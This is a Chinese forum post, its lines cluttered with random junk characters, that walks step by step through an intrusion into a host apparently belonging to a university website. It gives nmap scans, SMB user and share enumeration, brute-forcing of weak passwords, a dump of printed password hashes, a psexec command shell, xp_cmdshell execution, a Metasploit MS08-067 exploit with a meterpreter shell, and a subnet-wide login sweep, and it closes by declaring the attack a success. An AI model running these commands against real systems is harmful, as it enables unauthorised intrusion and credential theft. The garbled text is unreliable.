广西师范网站http://202.103.242.241/) V. K! |' A6 t3 P) e! c
( K% z+ y. m$ L5 _root@bt:~# nmap -sS -sV 202.103.242.241
) C( ^4 R% G0 T/ z5 a( l! y9 c
; T$ \4 S- J) p hStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
0 W$ C* C# R( l& N- f
. Y) `, T7 ]# n) Y2 N1 ANmap scan report for bogon (202.103.242.241)
* S" _, Z' W9 k! s. c# P( c: \/ b. |: S
Host is up (0.00048s latency).! {! @$ d! V* ?) v/ N7 {
7 C1 q0 i( \6 ] w$ i9 O. C. b0 J8 sNot shown: 993 closed ports
8 m7 ]2 A6 |# |7 [5 ?; ?5 u- F' B* D! l2 C* d2 {, H/ a
PORT STATE SERVICE VERSION' t& c6 [; l; Y/ ?$ J V
% d# f5 _+ s* D9 J4 u& }5 E; b8 Z" j' i135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe) l3 c- C+ u, F: _6 t6 C2 {# `% U
1 J% Q: z5 `% j* H/ t
139/tcp open netbios-ssn
2 }* p/ B4 L& Z# Y' x+ k% @/ f/ F
" q8 O7 ^/ @; M445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds" p4 Q+ b2 N0 A# F2 U; r
/ ~9 D: w7 @, {- N. N$ W! Y1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)7 M3 U7 U& e; {
: R3 _) C6 A2 K% P9 A1026/tcp open msrpc Microsoft Windows RPC
; E/ j B' ~4 [" e) y" T0 w3 ^" K
; r9 c4 }4 v* V0 A0 i- ^3372/tcp open msdtc?9 l+ x; {6 ~2 O, @, ~
) Y4 ^, a$ ^ x3389/tcp open ms-term-serv?+ C. W6 C& Q. S; Y
& N$ T+ W( W) @: r/ \ B7 F
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :& }( q& [! |8 [5 k3 P; h" Q3 v
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r, u# E, h7 ~3 f- k1 V4 I
D: v1 N0 t5 O5 N& q! f' a
SF GetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions
' ~: F! s: I0 s/ b* C& F8 h# w) i! n2 C, B
SF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)
) f. y) I6 u* I# |
+ f) N) A; t! f8 u2 N& fSF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO
1 a$ L' }2 r& j: X3 c/ G7 ^, ?- z/ e$ R3 ~1 [" V
SF:ptions,6,”hO\n\x000Z”);
t+ h3 \/ Y2 V- e; C# ~; g
) z8 e0 P2 ^6 W6 t0 bMAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)* @8 B( A3 d+ m
, v& w8 J; N8 J9 ^! t% \. k
Service Info: OS: Windows3 {& L, K5 {* m& M/ i4 w# y
/ X0 f( Z2 P1 h* k$ ^; UService detection performed. Please report any incorrect results at http://nmap.org/submit/ .
5 q9 k: r% X1 B! v3 ~0 [) p$ O: [0 X% d( v9 k
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds+ ?9 L3 M' N/ s1 Y
% E/ s5 n# }/ z# Troot@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本( P) @3 y* m C7 ?5 R. A
- Z O- b- f1 J-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse
% z& w( M5 L8 D6 ?% o9 n- a6 N; Z4 e: z2 x! G7 j" N
-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse' N! G; J& J- b6 D. m) i& I9 p. g
$ b) U& v: b6 n8 T W/ `
-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse
" S/ d, l9 }9 J) E' {2 X' c& L( q3 }! @. D% X9 E; V, B. X/ N- T
-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse
( ]% g7 U8 R0 B! w( L. I K7 O4 C. z9 U
-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse$ ~0 S5 z- M" {% k3 j+ Y2 k2 F
9 L% `- B- n+ N- f6 N7 ~ K-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
4 A& q ]1 i Q4 A d. @1 E* h& F- |+ h* u
-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse
8 v; d7 ~9 E1 d1 i
4 z0 N- U4 s* c4 j% z9 C-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse4 V2 g5 _/ V' X7 B. p& Y
. F6 L- y9 d4 ]& c G2 `-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse7 f! w! u! N, ]' ]! p* q
) u9 \& @6 k! v0 L
-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse
# i4 \; {' \- w
{0 I7 c2 n: X" s! R-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
, [: l0 `+ S" Y5 f J) \: K, Z- s
0 a$ Q8 [& D: j. z. W3 y: i-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse
! @" Z4 a" R# g; f
( b. D7 ?& M" p/ j" @8 l-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse& c# P2 L5 G) K8 i
9 z$ V% I/ X; n-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse+ o) B- f7 F0 h7 U
: u$ i1 W/ k4 D/ F0 l5 \-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse1 Q" q6 S- ?" b; X
9 [. G3 G v3 T- r3 v% o( [root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241 ) d7 Q$ h& A; F. \" A
# i5 K7 `5 u7 m
//此乃使用脚本扫描远程机器所存在的账户名' d, @$ E5 y4 {; \# v
* L3 L. X7 q; o M9 X# b- X. R
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST3 `. G' a4 [2 k; w, U0 ]" @
1 F. ]5 k: X- T2 n) bNmap scan report for bogon (202.103.242.241)7 b, L# N8 v# ^7 C
- q* ~: z& X( N+ N
Host is up (0.00038s latency).
5 c0 A2 `5 T) \# Z0 Q5 U
" D9 ^* _( c5 a- {Not shown: 993 closed ports6 U- \ U" M+ @( e3 Q+ g
5 @4 [" `1 n; F# R' lPORT STATE SERVICE
& L: H. m$ r; K/ D# u) ? N
6 a0 A6 E' v) S( W1 W135/tcp open msrpc( C; A2 _) |/ ?
: S/ m1 \0 U6 I7 z139/tcp open netbios-ssn7 n: b0 z" V: |# P
1 |* Q w( [, Z. n( X
445/tcp open microsoft-ds9 F9 w' U+ c% G) ?2 H; t1 h. g
. Z# t; W2 \0 I; P3 x1 c, a1025/tcp open NFS-or-IIS
: E6 X1 g+ H/ i/ V% W
; w, Q# k+ u. P7 _$ R1026/tcp open LSA-or-nterm& { C. W6 j: x7 v# A, X/ f
: N. ~: }) ~6 _; G# L( f/ e
3372/tcp open msdtc( s! ~# Q5 |$ _1 `7 b8 v
# j7 `, O1 h3 ]" G
3389/tcp open ms-term-serv
" `; a6 E; x5 K9 ]4 v
; |$ w+ m+ u: v7 Y1 k @MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems). A# I7 h4 R8 }8 i% r1 f3 l
$ V9 {* a! {" T2 Y4 l
Host script results:
6 M: s: u- ~: E8 k8 M, r
# E( M# t9 X9 [# a2 e- R| smb-enum-users:
& [9 L4 a1 A8 \" r! k3 m. m5 Z. w' V, Y4 T- d u* @
|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果
+ R t ]1 `& N5 r0 B( B# y4 P: L+ a1 ?3 l8 ]
Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds! F+ G( [4 D9 u/ z
) r6 u, s$ T& b# B0 J& b. d V% u' r) [root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241
( f9 o m( N) F& Y) R2 H( _0 @! m1 |- K' F$ n" e: ^
//查看共享' ~0 A2 Z# H- E7 G
9 k+ w$ ?1 l d( k' EStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
1 H$ a2 u7 a" `9 _( Q- T& y2 z& V
+ I4 K0 W" Y. YNmap scan report for bogon (202.103.242.241)
- \; E8 |$ M3 I0 c2 u1 P" p6 [5 Y" H$ d+ o" J+ _5 J9 w8 e5 c! |5 z8 H
Host is up (0.00035s latency).
* ^. x. \8 x5 W; x8 s$ H# x j
: I8 W) i! x" v5 T5 ZNot shown: 993 closed ports9 D/ B: {2 v2 f! q
Z' I |+ B* j+ @8 c6 v
PORT STATE SERVICE! i( `6 @' ^1 v0 H: C. `. y
! \; [) a; F& H- `8 h135/tcp open msrpc
5 o4 Q: b; d; l0 F7 L4 W, E( I" n2 r9 |7 i2 r2 e( V
139/tcp open netbios-ssn4 c; k) U* C5 u& L) |* r' c
& G3 h- a* `$ x: o. d. ^! Q
445/tcp open microsoft-ds
. T! v0 ^$ y. v+ P& V
5 y. Q; a: ?! w2 W1 Y+ M1025/tcp open NFS-or-IIS
1 `! `5 ~/ o9 J+ d. a
: W x, N: Y9 [& D1026/tcp open LSA-or-nterm2 L" s$ e f6 } G* O9 a
$ i1 i1 ?% J8 t9 x3372/tcp open msdtc* E/ M7 H# a; z( g% g" e
: P$ ~ W+ w$ l- N
3389/tcp open ms-term-serv
+ h# u, [' r7 {$ V7 `1 L% i* I+ E+ _7 x6 f7 z9 V9 ^' V* B. c; K
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
% W0 E% y$ Q H$ K3 O5 l |* W- J0 L7 E, M- {
Host script results:6 }& X2 Z! H# }4 p+ J e' u& W7 y+ K
1 f) M* E: d0 \; R
| smb-enum-shares:
/ H7 A/ O `' f. e9 M& T
0 g; ~2 |0 X) V) B6 @| ADMIN$& V ~0 ^: S2 d$ J8 O) b I
# B' J6 A2 z" d| Anonymous access: <none>" L+ K3 C) Y4 {% w( k9 s1 S; s
2 o% `9 ~, Z' S
| C$1 l) e5 }* w$ i5 t+ _
- [0 U+ m1 i+ t1 U0 E
| Anonymous access: <none>3 r* `( ?$ w; {" @
3 B0 P5 l5 L+ ?4 A F: b+ L$ U
| IPC$7 ?9 v" W* W% X1 h( h
! K2 ]5 K0 F% v5 I- i7 j
|_ Anonymous access: READ
9 {# h: ?# z! k8 @& a3 j! { X% _9 h7 Z1 _0 D: s5 _
Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds! v* A3 x; @+ k( j' ~
- ]+ `9 C" D4 m0 ]; ^root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241 . ?2 Y T2 |0 [+ `& _9 I7 f; i
7 D. S: m7 x# n' S//获取用户密码' s+ s+ b& H# B) Q& F6 S' s b
; _7 p7 J- \3 M! X8 o/ O0 A3 U" f
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST/ y/ E' y# b. E9 U
# `( y4 {5 N: I% ]' t- E
Nmap scan report for bogon (202.103.242.2418)
% p' D6 e- g- O! K1 `, a
, |5 Q3 x8 ?. P5 ~4 a- c6 v0 vHost is up (0.00041s latency).) Y, ^8 A# z4 {+ x4 W
4 `7 m* f0 |8 h$ a! L( E, nNot shown: 993 closed ports
; c2 Q# x7 ^* h0 o }1 X4 _, ~; C m- p( e7 |
PORT STATE SERVICE
4 u1 s% z J2 e+ `+ ]$ [
$ S6 M& {( ^( w' n/ A, p135/tcp open msrpc
2 u A/ N$ a4 t- Z' D; E! _* X H* j2 X: ]/ [
139/tcp open netbios-ssn$ [' q) o+ l6 n: x
* W$ x, L6 i: ^: \$ ~6 z3 l
445/tcp open microsoft-ds
3 i; m- x6 @8 t G7 B8 }& v" D( }5 D! k6 I$ Y' u2 }- o5 i e( B
1025/tcp open NFS-or-IIS
* ^+ ?( h7 N5 r+ B$ J0 t2 c% p/ U8 B4 u) l& Q1 F
1026/tcp open LSA-or-nterm
; ?7 M7 z0 h0 k- R
# F! k$ k- w: G2 F9 X) T3372/tcp open msdtc( e+ r t$ N; R2 @& D
/ T! m' r0 ^0 X$ j! d' y
3389/tcp open ms-term-serv
9 b% H# E5 H9 i% n; \7 p' f7 z U# u
. F8 [2 d& t5 S5 a! ]" x$ jMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)& v; L+ Q# ~! J+ u$ X2 S( Y
! ~' q. f1 k7 X0 J! `* b
Host script results:
8 c+ c# \" ]5 O
8 Y7 K |$ k# ]0 L; V| smb-brute:, q; Z8 N8 m" u
" Y3 D( a: }# |6 s; fadministrator:<blank> => Login was successful. h4 {1 P. ?6 x# k5 J& e
+ U/ T/ _( b" A- m$ f
|_ test:123456 => Login was successful. D% f6 F0 T" _* J/ e6 M
2 I: Z3 V& L6 g5 U3 \Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds
& @! H3 G) l4 p( u) W
6 Y! v; o% Z5 P/ lroot@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash% p4 G2 ]$ r1 p. F- G! n( J1 f
& @) ]3 e$ w) f R, _root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data7 R2 u/ f+ g n1 f; X' s. e
! o2 _0 Z8 ~# t/ d) x# xroot@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
, N* S2 p/ O& }" f. n* _; T) S; {3 Z* i+ ]
root@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139
8 {: g+ ^, }* ?0 h4 |/ t* a( V$ C
! ?& K9 K" @2 l% X& UStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
9 D7 q) Y+ c7 k+ f- ~/ ]$ r5 C
* \8 @3 N% l, E# p0 oNmap scan report for bogon (202.103.242.241)
/ [8 `( H& |* R# G- P8 |- M6 E4 G2 k" R% m
Host is up (0.0012s latency).
, j5 @5 O7 C7 u2 M0 t+ W1 F, M' b$ j t" L
PORT STATE SERVICE
9 ?2 t$ u; s- }% J1 Q8 s; \' e" e4 k6 r- j. V$ I X
135/tcp open msrpc) A# e3 [ E0 k% g# f/ O# s
x3 o8 n' s3 o8 o7 f
139/tcp open netbios-ssn
: a' T8 F1 W/ M# X2 p! `/ n; x [$ x) M. ]1 U) w( i X. P
445/tcp open microsoft-ds
* T; X+ z( M6 V2 |
# R' t! b* E2 ]$ f& K% r. @8 ZMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)6 j9 W. W1 | }# `) P
) B) o9 U7 u; Y
Host script results:
! J5 {# f6 W% Y* w0 O' a) O
+ Y- {; L( N% h$ K| smb-pwdump:
l1 `7 u% L; x% h+ N0 M: O
" C7 c+ t# \ n* K| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************6 m5 [; o* c" J' h9 F
' G0 M9 x9 Y" F. o! T" c1 o| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
$ W- _8 c; {% X4 i6 ? W7 U9 [) H" y
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4- n* I! `( p; e ]' f8 \ u Y( O
; Y6 ?4 T' L, G; E8 N0 Z' o. f
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2" T6 E$ D- U( G& }" S8 j. S
9 k8 t7 Y, C6 \/ h! d# t; T6 w3 w* v/ L8 ANmap done: 1 IP address (1 host up) scanned in 1.85 seconds5 T& j9 y6 p+ ]5 k. t
5 k9 [. N* k$ h0 a6 f
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell
9 B$ I2 y0 S) t# K) g- z1 t; d& C B9 j% @0 G/ Q0 O- a1 h
-p 123456 -e cmd.exe& N" K. ^6 H8 ]6 h
& @& L/ F" T+ c, S* R+ H
PsExec v1.55 – Execute processes remotely: W5 R5 G3 Z9 g+ i3 z, g& [
' t$ V' Y6 q! o8 y0 B! K2 G3 n
Copyright (C) 2001-2004 Mark Russinovich, h4 b, a- [1 `: |8 |/ Y' }9 M& o+ F
' k3 d7 Q, r" q1 y/ n& n8 C1 }
Sysinternals – www.sysinternals.com
7 q1 M5 S* x5 m/ | z& [4 r1 _
3 W7 E; p) P+ jMicrosoft Windows 2000 [Version 5.00.2195]% F' u; D) u1 k6 ^8 z v
4 S! K: j- i) M
(C) 版权所有 1985-2000 Microsoft Corp." I& z$ {3 N; J! O# p7 U l
W; n. u7 t6 j4 G$ g/ ~8 zC:\WINNT\system32>ipconfig
2 j2 ^0 L! X$ z. U
$ k7 c/ ~- s% H/ E, |. CWindows 2000 IP Configuration, }$ u' h+ ~( t" Q1 E7 G
5 @2 x/ ?% {" D% ^2 h i7 CEthernet adapter 本地连接:5 c* e. C% Y5 D1 |
& n' D' v1 D- g5 j! W8 |
Connection-specific DNS Suffix . :& w; h0 [/ [7 _ G3 E
! i0 t8 h# p2 y) wIP Address. . . . . . . . . . . . : 202.103.242.241 h. Z- x/ Q* b _
* W2 A0 k5 `, G7 V! y
Subnet Mask . . . . . . . . . . . : 255.255.255.0( {$ r* T: ~$ [
9 F( |( s6 p/ v+ _. Y
Default Gateway . . . . . . . . . : 202.103.1.1
* l, W" K: L& @) F3 Q
7 T4 y0 H7 x y5 BC:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令+ X* N$ J6 K1 Q& Z
: V) P, J/ C' A" J' D
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞
5 Y/ X$ t5 G j. o' u
& l8 R% f6 l7 K: N3 R) CStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST+ q6 g3 ~, b) r9 p) J- V
/ t! P& @3 N% g$ s1 |$ p
Nmap scan report for bogon (202.103.242.241)
& d- J$ ]* E5 k
% `& ?5 ~8 I* P1 g$ D5 p$ @0 x% EHost is up (0.00046s latency).( i2 d- J- d9 A
+ Y) R ?0 E5 Q# }! m
Not shown: 993 closed ports
7 E; J, a6 ]4 `1 }2 z
" k; R+ N2 X; y( E+ ^- j4 o2 IPORT STATE SERVICE
: d5 W0 O4 c" i% ~. v0 S8 n* t( \! l# T* D& o5 N
135/tcp open msrpc
. b$ `8 ]' n! n$ Y1 J) y3 E3 Q) X
' c) B6 I; n" n' e+ Z* ^8 d& W139/tcp open netbios-ssn
' s# N6 |6 s5 s+ f- x1 E v. Y
6 x+ D5 P+ V5 E4 w. X- ^) S445/tcp open microsoft-ds
9 E( Z6 @) S' b* d
8 x' Z0 F6 M! g# D1025/tcp open NFS-or-IIS$ T1 {$ e$ B8 a* u
! G" W: w2 ^- w( l4 e9 Y. |1026/tcp open LSA-or-nterm
4 P+ ~, j/ i( L% z7 {) s4 o9 ~4 z9 M- s" b) |: t
3372/tcp open msdtc
" K4 ^7 Z/ g( M, T1 W/ b
# Q- [3 s" I' ~* f$ T. a3389/tcp open ms-term-serv
9 h% {: d I A5 t1 `" R7 Z) k6 c( l7 ^! ~
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
# X: u" [- P- ?1 g2 n" y! ~9 A
$ s2 q0 d$ d% |/ p/ ZHost script results:
! p! {- d& u* Y9 K! g
W. q' L: R( h# h* o| smb-check-vulns:5 \, I/ G5 \- L* \
: s5 v0 a9 E0 b4 Q' r# j! d
|_ MS08-067: VULNERABLE/ G" P9 M7 i+ T: `( b
' d6 i. T1 e' h/ ONmap done: 1 IP address (1 host up) scanned in 1.43 seconds) c6 T. }3 Q* L7 Q+ U
- E$ m- P B+ l2 P+ M1 C+ ] m
root@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出8 N# S' J! }/ a/ M& P0 J
5 x* T4 o/ Y0 z* Z- q1 ?
msf > search ms08; C0 e5 z( W! |3 p0 y$ B
) R5 g) H; T/ F p
msf > use exploit/windows/smb/ms08_067_netapi
; g) f+ b8 f# O- p! g, R- W
4 k8 K* n$ u( a" b. E8 ~msf exploit(ms08_067_netapi) > show options, R# B" w6 W7 ` p; O7 E6 i- T) ~, h" ^
# T; U7 B' q$ C( W/ Tmsf exploit(ms08_067_netapi) > set RHOST 202.103.242.2415 J% l9 D2 C3 k9 Y( u) I
- Y: P3 I' C7 ~7 Q- o
msf exploit(ms08_067_netapi) > show payloads
+ f1 c6 t- T- {6 M5 t1 n# a
8 l+ P+ H1 k% b' H6 h/ Vmsf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
* P. f3 v& Q/ f T" o
8 Z3 e8 q! g, |, k8 [msf exploit(ms08_067_netapi) > exploit) V& p6 g9 Z4 i8 `1 N
# m& }1 V4 z2 v
meterpreter >
* u: m( }1 {$ f) F. @
8 L0 J$ U% C H/ G" w( |Background session 2? [y/N] (ctrl+z)
: \. Q, r2 j) q6 K" }
6 T- a8 v- F! k3 Z7 B! umsf exploit(ms08_067_netapi) > sessions -l [3 V$ D, `6 e3 _7 n& Z1 X
$ n6 _6 Y0 F5 E3 j7 ?% T
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt0 C3 u0 o- t8 m/ C
?6 r/ k% H) b- }6 m8 A$ c2 \
test
. }3 o4 T9 t3 m- L# p$ ^2 Y% s: |4 |: a) c- |. C4 r: F. x: S1 |
administrator3 S, J5 u/ g1 O. }
/ ?5 W9 n$ i/ x/ ]4 I, C* A
root@bt:/usr/local/share/nmap/scripts# vim password.txt
$ ~% u+ C& [5 @/ @# I7 C0 B: v' t/ S& d: W. h2 a. M# s
44EFCE164AB921CAAAD3B435B51404EE$ n: i/ P) E% K {! b6 B: g* ?
9 [! J0 z0 P$ X2 z0 N3 {2 groot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
% E) A. \7 H; I5 J
6 B6 \7 r" h& c% T //利用用户名跟获取的hash尝试对整段内网进行登录3 s6 t( S1 ^3 C- L- V- k
" D, Y1 Q% P% I( `1 X' h+ v0 DNmap scan report for 192.168.1.105
& ^9 @# `7 v4 i
* x1 b. z y0 vHost is up (0.00088s latency).
# e2 V# X/ y; R9 L7 l% f# K6 o- M1 |# Z2 l$ R7 j2 q
Not shown: 993 closed ports. u" F B4 w. U! F3 C" `3 }3 `# A
# G" E; X6 u8 R! d& ]3 y$ kPORT STATE SERVICE
2 O- ?4 h8 t/ O1 V7 h- B, h- B, S) I
135/tcp open msrpc
0 O8 x! z4 D2 T4 k( E8 ~" g1 o7 x# a) H# y
139/tcp open netbios-ssn5 `! o7 J' X0 y" _6 V
: ^( f4 L# y0 \9 i4 ]" i
445/tcp open microsoft-ds- n$ x @2 i* o3 q
5 a- g2 Q0 @0 O1 t+ D
1025/tcp open NFS-or-IIS
& b! x+ v# _$ t# ^. a+ K4 u9 T$ n! M) `, g
1026/tcp open LSA-or-nterm' B' r* ^8 B7 i$ i5 K
- e4 W5 i. N+ g4 D, Q$ p7 ?3372/tcp open msdtc
. S: m) e& z" Z2 v1 a9 |; D3 E* Y' @: Z4 y x- U
3389/tcp open ms-term-serv
! q8 v( O, t9 x! N4 @1 _, y( a% m# N$ S* E0 ^0 v1 k
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
" O& {2 O8 ^, j
9 l4 v) ]& p; J+ K {2 s2 B9 I. yHost script results:
' Z+ l: y& u; N% q. K
9 A! P- L" [ P4 ]$ ~| smb-brute:
) q! P1 w# g k- i" K# X! T5 h; j5 `) Z* I) Z" `; k: q7 Q
|_ administrator:<blank> => Login was successful1 \+ C+ V& [( D1 h/ V, z+ p
' t7 H0 a' d4 j
攻击成功,一个简单的msf+nmap攻击~~·; l8 g; F: |) a: N' @5 D! X
@! e. d( D' f# ~; d$ l! C; e4 ]% _ |
发表于 2012-12-4 12:46:42
收藏
支持
反对